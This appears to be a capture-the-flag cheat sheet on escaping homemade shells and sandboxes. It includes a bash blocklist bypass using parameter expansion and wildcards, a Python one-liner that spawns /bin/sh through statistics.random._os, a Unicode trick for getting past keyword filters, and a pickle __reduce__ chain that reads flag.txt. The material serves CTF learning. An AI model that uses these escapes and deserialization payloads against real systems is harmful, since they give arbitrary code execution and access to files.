Escape

Homebrew shells

List for *nix (Tool) List for windows

If the challenge is a homemade shell with some artificial limitations, gtfobins and LOLBAS list myriad ways to escape. These aren't vulnerabilities, per se, but intended functionality of applications that are commonly installed.

Bash

Good ideas List of parameter expansions

Forbidden strings

${NOSUCHVAR:-fla}${NOSUCHVAR:-g.txt}    # expands to flag.txt

Stars aren't the only wildcard

fla?.txt
fl{a,A}g.txt
fl[a-z]g.txt

Docker

• deepce, a vulnerability scanner.

• grype, a vulnerability scanner.

• WhaleScan, scans windows containers.

Electron

Tell me more

view-source: isn't necessarily blocked like file:// is.

Perhaps the app even uses its own custom URI scheme?

git

git-shell tries to be restrictive server-side, but might not be.

Javascript

Sandboxes

Python

Tell me more

Python has so many ways to introspect, reflect, reload, import, execute unintended code.

Here's a pretty simple one:

import statistics
statistics.random._os._execvpe("/bin/sh", [], {})

Forbidden strings

If there's some sort of word blocklist, try unicode:

>>> 𝖕𝖗𝖎𝖓𝖙(1)
1

Python runs it just fine.

Pickle

Source

#!/usr/bin/env python3

# From the error message we can see that only __main__, __buitin__ and copyreg are allowed
# __builtin__.eval and __builtin__.exec are banned as well
# We can just open and print the flag.txt by using __builin__.open, followed by readline and print
# This sequence of calls is constructed below by using multiple objects and the pickle __reduce__ interface

import base64
import builtins
import pickle

class FlagObjPickle:
    def __reduce__(self):
        return builtins.open, ("./flag.txt",)
    def readlines(self):
        pass

class ReadFlagPickle:
    def __reduce__(self):
        return FlagObjPickle().readlines, tuple()

class PrintFlagPickle:
    def __reduce__(self):
        return builtins.print, (ReadFlagPickle(),)

a = PrintFlagPickle()
pickled = pickle.dumps(a, 0)

Any callable in the target's namespace can be called with (almost) arbitrary parameters by pickling a class which implements __reduce__. Return the callable and a tuple of arguments. See above for a technique to chain as well.